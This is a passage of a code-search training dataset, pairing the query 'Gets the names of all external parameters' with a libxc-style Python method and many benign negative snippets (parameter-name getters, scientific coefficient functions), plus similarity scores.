np.power((1.0+(r/rc)**2), 0.5-3*beta) + c", "def make_coefficients(r, a, num_terms):\n\n\tnum_vars = 4\n\tcoeffs = np.zeros((num_vars, num_terms))\n\tfor i in range(num_vars):\n\t\tcoeffs[i, i+1] = r[i]\n\tcoeffs[0, [5, 6, 7, 8]] = a[0]\n\tcoeffs[1, [6, 9, 10, 11]] = a[1]\n\tcoeffs[2, [7, 10, 12, 13]] = a[2]\n\tcoeffs[3, [8, 11, 13, 14]] = a[3]\n\t\n\treturn coeffs.ravel()", "def xi2fromCambPk(c,r):\n r = M.asarray(r)\n return N.trapz(c.k**3*c.pk*sf.j0(M.outer(r,c.k)),\n M.log(c.k))/2.0/M.pi**2", "def _read_coefficients(self):\r\n coeff = self._read_register(_BME280_REGISTER_DIG_T1, 24)\r\n coeff = list(struct.unpack('<HhhHhhhhhhhh', bytes(coeff)))\r\n coeff = [float(i) for i in coeff]\r\n self._temp_calib = coeff[:3]\r\n self._pressure_calib = coeff[3:]\r\n\r\n self._humidity_calib = [0]*6\r\n self._humidity_calib[0] = self._read_byte(_BME280_REGISTER_DIG_H1)\r\n coeff = self._read_register(_BME280_REGISTER_DIG_H2, 7)\r\n coeff = list(struct.unpack('<hBBBBb', bytes(coeff)))\r\n self._humidity_calib[1] = float(coeff[0])\r\n self._humidity_calib[2] = float(coeff[1])\r\n self._humidity_calib[3] = float((coeff[2] << 4) | (coeff[3] & 0xF))\r\n self._humidity_calib[4] = float((coeff[4] << 4) | (coeff[3] >> 4))\r\n self._humidity_calib[5] = float(coeff[5])", "def test_coefficients_tf_interface(self):\n import tensorflow as tf\n\n qnode = qml.QNode(self.circuit, self.dev)\n\n weights = tf.Variable([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)", "def vnC(self):\n return np.array(\n [x for x in [self.nCx, self.nCy, self.nCz] if x is not None],\n dtype=int\n )", "def deriv2(self, model, v=None):\n\n k1, k2, k3 = self.coefficients\n if v is not None:\n v1, v2 = self.wire_map * v\n p1 = k1**2 * v1 + k2 * k1 * v2\n p2 = k2 * k1 * v1 + k2**2 * v2\n return np.r_[p1, p2]\n else:\n n = self.regularization_mesh.nC\n A = utils.sdiag(np.ones(n) * (k1**2))\n B = utils.sdiag(np.ones(n) * (k2**2))\n C = utils.sdiag(np.ones(n) * (k1 * k2))\n return sp.bmat([[A, C], [C, B]], format=\"csr\")", "def capenergy(C, V):\n energy = 1 / 2 * C * V ** 2\n return energy", "def A_coefficients_symmtop(v, bProlate=True):\n v=_sanitise_v(v)\n if bProlate:\n # Use z-dim.\n z2=np.square(v.take(-1,axis=-1))\n else:\n # Use x-dim.\n z2=np.square(v.take(0,axis=-1))\n onemz2=1-z2\n A0 = np.multiply( 3.0, np.multiply(z2,onemz2))\n A1 = np.multiply(0.75, np.square(onemz2))\n A2 = np.multiply(0.25, np.square(np.multiply(3,z2)-1))\n return np.stack((A0,A1,A2),axis=-1)\n #z2=v[2]*v[2]\n #A=np.zeros(3)\n #A[0]= 3.00*z2*(1-z2)\n #A[1]= 0.75*(1-z2)**2\n #A[2]= 0.25*(3*z2-1)**2\n #return A", "def beta_coef_(self):\n return pcr_beta_coef(self.regression, self.prcomp)", "def __init__( self, u = [ 1., 0., 0. ], v = [ 0., 1., 0. ], w = [ 0., 0., 1. ], coeff = 1. ): \n\tdirect = [ u, v, w ]\n self.coeff = coeff\n\tself.direct = [ [ i*coeff for i in j ] for j in direct ]\n self.reciprocal_updated = False\n self.lattice_parameters_updated = False\n self.volume_updated = False\n self.get_lattice_parameters( u, v, w )\n self.get_volume( u, v, w )\n self.get_reciprocal_basis( u, v, w )", "def get_coeff(self):\n return bernoulli(self.degree+1) / factorial(self.degree + 1)", "def ric2bci(ric_vec, raan, inc, w, nu):\n\n # Checking for special orbit cases\n if np.isnan(w) == True:\n w = 0\n if np.isnan(raan) == True:\n raan = 0\n\n # Argument of Latitude\n u = w + nu\n\n bci_vec = R3(-raan) @ R1(-inc) @ R3(-u) @ ric_vec\n\n return bci_vec", "def return_coef(self):\n try:\n model_coef = self.cmodel.coef_\n except:\n model_coef = 'Model does not have a .coef_ attribute.'\n\n return model_coef", "def test_coefficients_jax_interface(self):\n import jax\n\n # Need to enable float64 support\n from jax.config import config\n\n remember = config.read(\"jax_enable_x64\")\n config.update(\"jax_enable_x64\", True)\n\n qnode = qml.QNode(self.circuit, self.dev, diff_method=\"parameter-shift\")\n\n weights = jax.numpy.array([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)\n\n config.update(\"jax_enable_x64\", remember)", "def calculate_bic(R, u_t, inverse_transform_test, model_list, x_nodes):\n\n evidence_list = [] # model evidence, i.e. BIC for each model\n for i_model, model in enumerate(model_list):\n k = model.terms\n if k == 0: # does not make sense to compute model without any terms\n continue\n # coefficients are normed and correspond to normed R (if norming in preconditioning applies)\n weights = model.coefficients # unnormed coefficients from training set\n # norm weights found in training to correspond to norming in test data, which is different in general\n weights = np.dot(np.linalg.inv(inverse_transform_test), weights)\n\n # n_eff:\n n = x_nodes # presumption\n\n y_predict = np.dot(R, weights) # predicted u_t from training weights\n err_vect = u_t.squeeze() - y_predict.transpose() # residual vector\n err_vect = err_vect.transpose()\n s_2 = np.dot(err_vect.transpose(), err_vect) # sum of squared residuals\n # BIC:\n log_evidence_BIC = -(n / 2) * np.log(s_2) - (k / 2) * np.log(n)\n\n evidence_list.append([i_model, log_evidence_BIC])\n return evidence_list", "def brownian_coefficients(\n temperature,\n dt,\n friction,\n masses):\n fscale = dt/friction\n kT = BOLTZ * temperature\n\n invMasses = 1.0/masses\n sqrtInvMasses = np.sqrt(invMasses)\n\n nscale = np.sqrt(2.0*kT*dt/friction);\n\n ca = 0.0\n cb = fscale*invMasses\n cc = nscale*sqrtInvMasses\n return ca, cb, cc", "def b12(self,k1,k2,c):\n return 2.0/3.0*(1-self.mu)*c.pkInterp(k1)*c.pkInterp(k2)", "def generateCoefficients (self):\n\t\tself.ws = []\n\t\tif not self.sine:\n\t\t\tself.bs = []\n\t\tmean = np.zeros(self.dim)\n\t\tcov = np.eye(self.dim)*(2*self.gammak)\n\n\t\tif self.sine:\n\t\t\tfor _ in range(self.rn):\n\t\t\t\tself.ws.append(nr.multivariate_normal(mean, cov))\n\t\telse:\n\t\t\tfor _ in range(self.rn):\n\t\t\t\tself.ws.append(nr.multivariate_normal(mean, cov))\n\t\t\t\tself.bs.append(nr.uniform(0.0, 2*np.pi))", "def cr_v(self, v, k):\n\n return self.cr(v[:, 0], v[:, 1], v[:, 2], k).T", "def calculate_coefficients(self):\n for i in range(0, self.nz):\n zno = i * self.dz\n self.z[0][i] = zno\n plot_eccentricity_error = False\n position = -1\n for j in range(0, self.ntheta):\n # fmt: off\n self.gama[i][j] = j * self.dtheta + (np.pi - self.beta)\n [radius_external, self.xre[i][j], self.yre[i][j]] = \\\n self.external_radius_function(self.gama[i][j])\n [radius_internal, self.xri[i][j], self.yri[i][j]] = \\\n self.internal_radius_function(zno, self.gama[i][j])\n self.re[i][j] = radius_external\n self.ri[i][j] = radius_internal\n\n w = self.omega * self.ri[i][j]\n\n k = (self.re[i][j] ** 2 * (np.log(self.re[i][j]) - 1 / 2) - self.ri[i][j] ** 2 *\n (np.log(self.ri[i][j]) - 1 / 2)) / (self.ri[i][j] ** 2 - self.re[i][j] ** 2)\n\n self.c1[i][j] = (1 / (4 * self.viscosity)) * ((self.re[i][j] ** 2 * np.log(self.re[i][j]) -\n self.ri[i][j] ** 2 * np.log(self.ri[i][j]) +\n (self.re[i][j] ** 2 - self.ri[i][j] ** 2) *\n (k - 1)) - 2 * self.re[i][j] ** 2 * (\n (np.log(self.re[i][j]) + k - 1 / 2) * np.log(\n self.re[i][j] / self.ri[i][j])))\n\n self.c2[i][j] = (- self.ri[i][j] ** 2) / (8 * self.viscosity) * \\\n ((self.re[i][j] ** 2 - self.ri[i][j] ** 2 -\n (self.re[i][j] ** 4 - self.ri[i][j] ** 4) /\n (2 * self.ri[i][j] ** 2)) +\n ((self.re[i][j] ** 2 - self.ri[i][j] ** 2) /\n (self.ri[i][j] ** 2 *\n np.log(self.re[i][j] / self.ri[i][j]))) *\n (self.re[i][j] ** 2 * np.log(self.re[i][j] / self.ri[i][j]) -\n (self.re[i][j] ** 2 - self.ri[i][j] ** 2) / 2))\n\n self.c0w[i][j] = (- w * self.ri[i][j] *\n (np.log(self.re[i][j] / self.ri[i][j]) *\n (1 + (self.ri[i][j] ** 2) / (self.re[i][j] ** 2 - self.ri[i][j] ** 2)) - 1 / 2))\n # fmt: on\n if not plot_eccentricity_error:\n if abs(self.xri[i][j]) > abs(self.xre[i][j]) or abs(\n self.yri[i][j]\n ) > abs(self.yre[i][j]):\n plot_eccentricity_error = True\n position = i\n if plot_eccentricity_error:\n self.plot_eccentricity(position)\n sys.exit(\n \"Error: The given parameters create a rotor that is not inside the stator. \"\n \"Check the plotted figure and fix accordingly.\"\n )", "def getVs(self, Vp, residual, beta):\n return Vp + beta*residual", "def model(a, t, D, m):\n xprime = a[1] # x' = v\n vprime = -D*a[0]/m # v' = -D*x/m\n return [xprime, vprime]", "def _create_coefficients(self) -> npt.NDArray[np.complex_ | np.float_]:\n _logger.info(\n f\"Slepian eigenvalue {self.rank}: \"\n f\"{self.mesh_slepian.slepian_eigenvalues[self.rank]:e}\",\n )\n s_p_i = self.mesh_slepian.slepian_functions[self.rank]\n return sleplet.slepian_methods.slepian_mesh_forward(\n self.mesh_slepian,\n u_i=s_p_i,\n )", "def coeff_display_M202(Nstar=1,seeing=[0.9,0.,0.],npix=npix,zenith=0,filter='r', theta=0., phi=0,corrector='corrector',x=0.,y=0.,z=0.,zernike_max_order=20,regular=False):\n hdu = genImgVallCCD(Nstar=Nstar,seeing=seeing,npix=npix,zenith=zenith,filter=filter, theta=theta,phi=phi, corrector=corrector,x=x,y=y,z=z,regular=regular)\n nn = len(hdu)\n data = []\n colnames = ['x','y','M20','M22','M31','M33']\n for hdui in hdu[1:]:\n Nobj = hdui.data.shape[0]\n M20=np.zeros(Nobj)\n M22=np.zeros(Nobj).astype(complex)\n M31=np.zeros(Nobj).astype(complex)\n M33=np.zeros(Nobj).astype(complex)\n for i in range(Nobj):\n img = hdui.data[i][4:].reshape(npix,npix)\n img = rebin(img,(40,40))\n M20,M22,M31,M33=complexMoments(data=img,sigma=4.)\n x=hdui.header['ccdXcen']\n y=hdui.header['ccdYcen']\n data.append([x,y,np.median(M20), np.median(M22), np.median(M31), np.median(M33)])\n data=np.array(data) \n betaAll=[]\n betaErrAll=[]\n R2adjAll=[]\n beta,betaErr,R2_adj,fitted = zernikeFit(data[:,0].real,data[:,1].real,data[:,2].real,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n for i in range(3,6):\n beta,betaErr,R2_adj,fitted = zernikeFit(data[:,0].real,data[:,1].real,data[:,i].real,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n beta,betaErr,R2_adj,fitted = zernikeFit(data[:,0].real,data[:,1].real,data[:,i].imag,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n betaAll = np.array(betaAll)\n betaErrAll = np.array(betaErrAll)\n R2adjAll = np.array(R2adjAll)\n ind = np.arange(len(betaAll[0]))\n momname = ('M20','M22.Real','M22.imag','M31.real','M31.imag','M33.real','M33.imag')\n fmtarr = ['bo-','ro-','go-','co-','mo-','yo-','ko-']\n pl.figure(figsize=(17,7))\n for i in range(3):\n pl.subplot(4,1,i+1)\n pl.errorbar(ind[1:],betaAll[i][1:],yerr = betaErrAll[i][1:],fmt=fmtarr[i])\n if i == 0:\n pl.title('x: '+str(hdu[0].header['x'])+' y: '+str(hdu[0].header['y'])+' z: '+str(hdu[0].header['z'])+' tilt: '+str(hdu[0].header['theta'])+' fwhm: '+str(hdu[0].header['s_fwhm'])+' e1: '+str(hdu[0].header['e1'])+' e2: '+str(hdu[0].header['e2']))\n pl.grid()\n pl.xlim(-1,len(betaAll[i])+1)\n pl.ylim(min(betaAll[i][1:])-0.5,max(betaAll[i][1:])+0.5)\n #pl.ylim(-0.1,0.1)\n pl.xticks(ind,('','','','','','','','','','','','','','','','','','','',''))\n pl.ylabel(momname[i])\n pl.xticks(ind,('Piston','Tip','Tilt','Astignism','Defocus','Astignism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20'),rotation=90)\n pl.xlabel('Zernike Coefficients')\n return betaAll,betaErrAll", "def beta_inversion(self) -> 'Nparray':\n return numpy.flip(self.coeff, 1)", "def svm():", "def acoeff(self):\n return np.dot(self.mmi,np.dot(self.mmatrix.T,self.bvec))", "def coeff_display(Nstar=1,seeing=[0.9,0.,0.],npix=npix,zenith=0,filter='r', theta=0., phi=0,corrector='corrector',x=0.,y=0.,z=0.,zernike_max_order=20,regular=False):\n hdu = genImgVallCCD(Nstar=Nstar,seeing=seeing,npix=npix,zenith=zenith,filter=filter, theta=theta,phi=phi, corrector=corrector,x=x,y=y,z=z,regular=regular)\n nn = len(hdu)\n data = []\n colnames = ['x','y','M20','M22','M31','M33']\n for hdui in hdu[1:]:\n Nobj = hdui.data.shape[0]\n M20=np.zeros(Nobj)\n M22=np.zeros(Nobj).astype(complex)\n M31=np.zeros(Nobj).astype(complex)\n M33=np.zeros(Nobj).astype(complex)\n for i in range(Nobj):\n M20[i],M22[i],M31[i],M33[i]=complexMoments(data=hdui.data[i][4:].reshape(npix,npix),sigma=2.)\n x=hdui.header['ccdXcen']\n y=hdui.header['ccdYcen']\n data.append([x,y,np.median(M20), np.median(M22), np.median(M31), np.median(M33)])\n data=np.array(data)\n betaAll=[]\n betaErrAll=[]\n R2adjAll=[]\n beta,betaErr,R2_adj = zernikeFit(data[:,0].real,data[:,1].real,data[:,2].real,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n for i in range(3,6):\n beta,betaErr,R2_adj = zernikeFit(data[:,0].real,data[:,1].real,data[:,i].real,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n beta,betaErr,R2_adj = zernikeFit(data[:,0].real,data[:,1].real,data[:,i].imag,max_order=zernike_max_order)\n betaAll.append(beta)\n betaErrAll.append(betaErr)\n R2adjAll.append(R2_adj)\n betaAll = np.array(betaAll)\n betaErrAll = np.array(betaErrAll)\n R2adjAll = np.array(R2adjAll)\n ind = np.arange(len(betaAll[0]))\n momname = ('M20','M22.Real','M22.imag','M31.real','M31.imag','M33.real','M33.imag')\n fmtarr = ['bo-','ro-','go-','co-','mo-','yo-','ko-']\n pl.figure(figsize=(17,13))\n for i in range(7):\n pl.subplot(7,1,i+1)\n pl.errorbar(ind,betaAll[i],yerr = betaErrAll[i],fmt=fmtarr[i])\n if i == 0:\n pl.title('x: '+str(hdu[0].header['x'])+' y: '+str(hdu[0].header['y'])+' z: '+str(hdu[0].header['z'])+' tilt: '+str(hdu[0].header['theta'])+' fwhm: '+str(hdu[0].header['s_fwhm'])+' e1: '+str(hdu[0].header['e1'])+' e2: '+str(hdu[0].header['e2']))\n pl.grid()\n pl.xlim(-1,21)\n if i ==0:\n pl.ylim(-10,65)\n elif i ==1:\n pl.ylim(-5,6)\n elif i ==2:\n pl.ylim(-5,6)\n elif i == 3:\n pl.ylim(-0.1,0.1)\n elif i == 4:\n pl.ylim(-0.1,0.1)\n elif i ==5:\n pl.ylim(-100,100)\n elif i == 6:\n pl.ylim(-100,100)\n pl.xticks(ind,('','','','','','','','','','','','','','','','','','','',''))\n pl.ylabel(momname[i])\n pl.xticks(ind,('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20'))\n pl.xlabel('Zernike Coefficients')\n return betaAll,betaErrAll", "def bayesian(R, v, m, C):\n\n # Convert to floating point numbers\n R = float(R)\n v = float(v)\n m = float(m)\n C = float(C)\n\n return ((v / (v + m)) * R + (m / (v + m)) * C)", "def test_coefficient_orders(self):\n for i in range(2, 5):\n spec = {2*j: 0 for j in range(i)}\n bcs_ref = BoundaryConditions(spec, 2*i-2)\n bcs_main = BoundaryConditions(spec, 2*i)\n\n coeffs_ref = get_ext_coeffs(bcs_ref)[i-1]\n coeffs_main = get_ext_coeffs(bcs_main)[i-1]\n\n assert coeffs_ref == coeffs_main", "def compCGP_C(M):\n # we store the coedd as a lower triangular matrix\n # random polynomial coefficients\n c = 0.5 * np.random.uniform(-1.0, -0.45, size=(M + 1, M + 1)) +\\\n 0.5 * np.random.uniform(0.45, 1.0, size=(M + 1, M + 1))\n for i in np.arange(M + 1):\n c[i, :] /= 2**(np.arange(M + 1) + i)\n c /= 1.5\n c = np.tril(c)\n c[0, 0] = 0\n c[1, 0] = 0\n c[1, 1] = 1\n\n return c", "def trans_coeffs(file_name, exci_info):\n ntrans_a = exci_info.nocc_a * exci_info.nvirt_a\n ntrans_b = exci_info.nocc_b * exci_info.nvirt_b\n ntrans_tot = ntrans_a + ntrans_b\n\n raw_array = read_gauss_rwf(file_name)\n # list of transition coefficients. Each element is 1 excitation\n exci_coeffs_add = []\n exci_coeffs_sub = []\n\n for i_ex in range(exci_info.nex):\n a_start = i_ex * ntrans_tot + 12\n a_end = i_ex * ntrans_tot + ntrans_a + 12\n b_start = i_ex * ntrans_tot + ntrans_a + 12\n b_end = i_ex * ntrans_tot + ntrans_tot + 12\n\n trans_a = raw_array[a_start:a_end]\n trans_b = raw_array[b_start:b_end]\n\n exci_coeffs_add.append(np.array([trans_a,trans_b]))\n\n for i_ex in range(exci_info.nex):\n n_skip = int((len(raw_array)-12-exci_info.nex)/2)\n a_start = i_ex * ntrans_tot + 12 + n_skip\n a_end = i_ex * ntrans_tot + ntrans_a + 12 + n_skip\n b_start = i_ex * ntrans_tot + ntrans_a + 12 + n_skip\n b_end = i_ex * ntrans_tot + ntrans_tot + 12 + n_skip\n\n trans_a = raw_array[a_start:a_end]\n trans_b = raw_array[b_start:b_end]\n\n exci_coeffs_sub.append(np.array([trans_a,trans_b]))\n\n ket_x_lis = []\n ket_y_lis = []\n\n for i,j in zip(exci_coeffs_add,exci_coeffs_sub):\n ket_x_lis.append((i[0]+j[0])/2)\n ket_y_lis.append((i[0]-j[0])/2)\n\n ket_x = np.array(ket_x_lis)\n ket_y = np.array(ket_y_lis)\n\n return ket_x, ket_y", "def calculate_condensate_params(Rvi, Bgi):\n\n Rsi = 1 / Rvi\n Boi = Rsi * Bgi\n\n return(Rsi, Boi)", "def absorption_coeffs(self):\n return self.energy_absorption[\"coeffs\"]", "def print_coeffs(f,model,v_coeff=None,w_coeff=None,wrad_coeff=None,timezero=None,final=False):\n if model.ncosF>0:\n if final: print >>f,\"===== final v_coeff =====\"\n else: print >>f,\"===== v_coeff =====\"\n for i,val in enumerate(v_coeff):\n print >>f, \"%8d %13.5e\" %(i,val)\n if model.ncosD>0:\n if final: print >>f,\"===== final w_coeff =====\"\n else: print >>f,\"===== w_coeff =====\"\n print >>f, \"%8d %13.5e\" %(0,w_coeff[0]+model.wunit) # only the first needs to be shifted\n for i,val in enumerate(w_coeff[1:]):\n print >>f, \"%8d %13.5e\" %(i+1,val)\n if timezero is not None:\n if final: print >>f,\"===== final timezero =====\"\n else: print >>f,\"===== timezero =====\"\n print >>f, \"%13.5e\" %(timezero)\n if wrad_coeff is not None:\n if model.ncosDrad > 0:\n if final: print >>f,\"===== final wrad_coeff =====\"\n else: print >>f,\"===== wrad_coeff =====\"\n print >>f, \"%8d %13.5e\" %(0,wrad_coeff[0]+model.wradunit) # only the first needs to be shifted\n for i,val in enumerate(wrad_coeff[1:]):\n print >>f, \"%8d %13.5e\" %(i+1,val)\n print >>f, \"=\"*10", "def algorithm_2_20_vector(p, t, c, x):\n\n mu = index(x, t)\n t = np.array(t, dtype=np.float64)\n c = np.array(c[mu - p:mu + 1], dtype=np.float64)\n\n for i in range(0, p):\n k = p - i\n t1 = t[mu - k + 1:mu + 1]\n t2 = t[mu + 1:mu + k + 1]\n omega = np.divide((x - t1), (t2 - t1))\n c = (1 - omega) * c[:-1] + omega * c[1:]\n return c", "def bjs(l, c):\n if len(l) == 4:\n l = mbvector(l)\n elif len(l) == 3:\n pass\n else:\n return 0\n v = np.array([1, pi, e])\n r = l / np.linalg.norm(l)\n m = np.cross(r, v)\n n = np.cross(r, m)\n m = m / np.linalg.norm(m)\n n = n / np.linalg.norm(n)\n w = np.arange(0, 2 * pi, 0.001)\n s = len(w)\n\n mm = vect_contract(m, c, m)\n mn = vect_contract(m, c, n)\n nm = vect_contract(n, c, m)\n nn0 = vect_contract(n, c, n)\n nn = np.linalg.inv(nn0)\n\n val1 = mm - np.dot(np.dot(mn, nn), nm)\n R = BB = np.zeros(shape=(3, 3))\n for i in range(1, s):\n t = 1 - cos(w[i])\n CO = cos(w[i])\n SI = sin(w[i])\n R[0, 0] = t * r[0] ** 2 + CO\n R[0, 1] = t * r[0] * r[1] - SI * r[2]\n R[0, 2] = t * r[0] * r[2] + SI * r[1]\n R[1, 0] = t * r[0] * r[1] + SI * r[2]\n R[1, 1] = t * r[1] ** 2 + CO\n R[1, 2] = t * r[1] * r[2] - SI * r[0]\n R[2, 0] = t * r[0] * r[2] - SI * r[1]\n R[2, 1] = t * r[1] * r[2] + SI * r[0]\n R[2, 2] = t * r[2] ** 2 + CO\n\n mr = np.dot(R, np.transpose(m))\n nr = np.dot(R, np.transpose(n))\n\n mm = vect_contract(mr, c, mr)\n mn = vect_contract(mr, c, nr)\n nm = vect_contract(nr, c, mr)\n nn0 = vect_contract(nr, c, nr)\n nn = np.linalg.inv(nn0)\n val2 = mm - np.dot(np.dot(mn, nn), nm)\n BB = BB + 0.5 * (val2 + val1) * (w[i] - w[i - 1])\n val1 = val2\n B = BB / (8 * pi**2)\n return B", "def _fv(self):\n return self.beta * (self.x ** self.c)" ]
[ "0.65958256", "0.65501094", "0.6504454", "0.6486117", "0.6194975", "0.61420995", "0.60554177", "0.60554177", "0.60174334", "0.5979773", "0.59653145", "0.59653145", "0.59482545", "0.59466475", "0.5945674", "0.59176135", "0.59019333", "0.58690476", "0.58312464", "0.582763", "0.57844913", "0.571731", "0.5712013", "0.5661301", "0.5642825", "0.5633623", "0.56261474", "0.5612051", "0.5610591", "0.55930054", "0.55260396", "0.55250525", "0.5514898", "0.5506186", "0.5503836", "0.549316", "0.5476961", "0.5455431", "0.54411614", "0.54320866", "0.54217637", "0.541903", "0.5414923", "0.5386276", "0.5385196", "0.5374794", "0.5372979", "0.5372545", "0.53668606", "0.5366216", "0.5365757", "0.53634983", "0.5362128", "0.5360005", "0.5353212", "0.533765", "0.53314286", "0.5313666", "0.53020734", "0.53020734", "0.53014284", "0.5270166", "0.52665854", "0.525221", "0.5247895", "0.524169", "0.5240335", "0.5222525", "0.5222067", "0.52106845", "0.5208695", "0.52059066", "0.51886404", "0.517392", "0.5170814", "0.5166013", "0.51531535", "0.51508117", "0.5130713", "0.51223207", "0.51109415", "0.51093626", "0.5104825", "0.509806", "0.50969577", "0.5096949", "0.5095664", "0.5090119", "0.5081798", "0.50726724", "0.5067863", "0.50651056", "0.506367", "0.5062842", "0.5059351", "0.5057907", "0.505522", "0.50489205", "0.50418717", "0.5038286" ]
0.83470845
0
Gets the names of all external parameters
def get_ext_param_names(self): num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info) ret = [] for p in range(num_param): tmp = core.xc_func_info_get_ext_params_name(self.xc_func_info, p) ret.append(tmp.decode("UTF-8")) return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parameter_names(self) -> List[str]:", "def get_param_names(self):\n return list(self.params.keys())", "def parameter_names(self) -> list:\n parameters = []\n parameters.extend(self.properties.parameter_names)\n return parameters", "def parameters_names(cls):\n return cls._Parameters._fields", "def _get_param_names(self):\r\n return sorted([p\r\n for p in self.__dict__\r\n if p != 'additional_args'])", "def get_ext_param_descriptions(self):\n num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info)\n\n ret = []\n for p in range(num_param):\n tmp = core.xc_func_info_get_ext_params_description(self.xc_func_info, p)\n ret.append(tmp.decode(\"UTF-8\"))\n\n return ret", "def get_param_names(hf):\n parameters = get_params(hf)\n return [p.name for p in parameters]", "def parameterNames(self, p_int): # real signature unknown; restored from __doc__\n return []", "def _external_params():\n list_ext_params = []\n list_ext_params.append(\n (hoomd.md.external.field.Periodic, \"params\",\n list([dict(A=1.5, i=1, w=3.5, p=5),\n dict(A=10, i=0, w=3.4, p=2)]), _evaluate_periodic))\n list_ext_params.append(\n (hoomd.md.external.field.Electric, \"E\", list([\n (1, 0, 0),\n (0, 2, 0),\n ]), _evaluate_electric))\n return list_ext_params", "def get_parameter_names(self):\n parNames = []\n # for par in self.variables: # TODO: LIKELY A BUG! DOES THE SAME AS get_variable_names()\n for par in self.parameters: # TRYING TO SOLVE THE ISSUE\n # EstimationVariable\n parNames.append(par.name)\n return parNames", "def parameters(self):\n return [p for _, a in vars(self).items() for p in self._params(a)]", "def get_hyperparameter_names():\n params = ['mu', 'nu', 'r', 's']\n return params", "def parameters(self):\n return []", "def _get_fitted_param_names(self):\n return self._fitted_param_names", "def get_paramnames_list(self):\n # TODO include syselem?\n\n query = \"SELECT NAME FROM %s\" % self.__schema\n with self.__connection.cursor() as cursor:\n cursor.execute(query)\n result = cursor.fetchall()\n return [val['NAME'] for val in result]", "def get_params_list():\n return common.QOL_PARAMS", "def get_layer_var_names(self):\n return(self.params)", "def _get_parameters(self) -> list:\n return self.parameters", "def get_params(self):\n return []", "def get_str_param_names(self):\n # Exclude self.api and self.names from the command string\n return self.get_attribute_names(FormattedParameter)", "def get_parameters_list(self):\n return self.description[\"config\"][\"values\"].keys()", "def get_mandatory_param_names(self):\n all_names = self.params.keys()\n return [name for name in all_names \n if not self.params[name].is_optional]", "def parameter_names(self):\n return [x for x in self.transformations.values() if isinstance(x, str)]", "def variables_used (self) :\r\n\t\treturn [i[0] for i in self.parameters]", "def keys(self):\n return self.params.keys()", "def get_resource_params():\n return Parameter.list()", "def parameters_list(self):\n return [getattr(self.parameters, p) for p in self.parameters_names()]", "def get_required_parameters(self) -> list:\n results = []\n if self.no_params or self.params_optional:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if not parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def param_names(\n self, *, include_tp: bool = False, include_gq: bool = False\n ) -> List[str]:\n return (\n self._param_names(self.model, int(include_tp), int(include_gq))\n .decode(\"utf-8\")\n .split(\",\")\n )", "def getParameters(self): #$NON-NLS-1$\r", "def names(self):\n result = []\n result.extend(self.positional_arguments)\n if self.arbitary_positional_arguments is not None:\n result.append(self.arbitary_positional_arguments)\n if self.arbitary_keyword_arguments is not None:\n result.append(self.arbitary_keyword_arguments)\n result.extend(self.keyword_arguments)\n return result", "def parameter_names(self):\n raise NotImplementedError(\"the parameter_names property should \"\n \"be defined in the Estimator sub-class\")", "def parameters(self):\n return [term.parameter for term in self.terms]", "def get_all_component_parameters(self) -> Dict[str, Any]:\n return self._node[\"app_data\"][\"component_parameters\"]", "def get_model_parameter_names():\n params = ['mu', 'rho']\n return params", "def names(self) -> List[str]:\n return sorted(self.hyperparams)", "def _get_param_names(self):\n temp_params = {'function': self.function, 'target': self.target}\n\n temp_params.update(self.kwargs)\n\n return temp_params", "def get_all_param_values(layer):\n params = get_all_params(layer)\n return [p.get_value() for p in params]", "def param(self):\n return []", "def param(self):\n return []", "def param(self):\r\n\r\n return []", "def param_unc_names(self) -> List[str]:\n return self._param_unc_names(self.model).decode(\"utf-8\").split(\",\")", "def get_params(self):\n return list(self.params.values())", "def list_params(ns):\n try:\n ns = make_global_ns(ns)\n names = get_param_server().getParamNames()\n names.sort()\n return [n for n in names if n.startswith(ns)]\n except socket.error:\n raise RosParamIOException(\"Unable to communicate with master!\")", "def get_params(self):\n pass", "def parameter_names(self, add_self=False, adjust_for_printing=False, recursive=True):\n if adjust_for_printing: adjust = lambda x: adjust_name_for_printing(x)\n else: adjust = lambda x: x\n if recursive: names = [xi for x in self.parameters for xi in x.parameter_names(add_self=True, adjust_for_printing=adjust_for_printing)]\n else: names = [adjust(x.name) for x in self.parameters]\n if add_self: names = map(lambda x: adjust(self.name) + \".\" + x, names)\n return names", "def _get_params(self):\r\n return self.k._get_params()", "def get_params(self):", "def param(self):\r\n return []", "def parameters(self):\n return self.vars", "def parameters(self):\n return self._params", "def getListOfLocalParameters(self, *args):\n return _libsbml.KineticLaw_getListOfLocalParameters(self, *args)", "def get_all_params(layer):\n layers = get_all_layers(layer)\n params = sum([l.get_params() for l in layers], [])\n return utils.unique(params)", "def potential_parameters(cls):\n return [\"k\", \"periodicity\", \"phase\", \"idivf\"]", "def potential_parameters(cls):\n return [\"k\", \"periodicity\", \"phase\", \"idivf\"]", "def get_resource_params(self):\n return Parameter.list()", "def get_resource_params(self):\n return Parameter.list()", "def get_params(self, pnames=None):\n l = []\n if pnames is None:\n pnames = self._params.keys()\n for pname in pnames:\n p = self._params[pname]\n if isinstance(p, Parameter):\n l.append(p)\n return l", "def getParameterList(self):\n inputList = []\n for name, n in zip(self._names, self._inputs):\n inputList += ['%s.x%d' % (name, i) for i in range(n)]\n return inputList", "def return_all_parameter_names():\n a = list(titles)\n a.append(r\"$\\chi^{2}$ per degree of freedom\")\n b = list(labels)\n 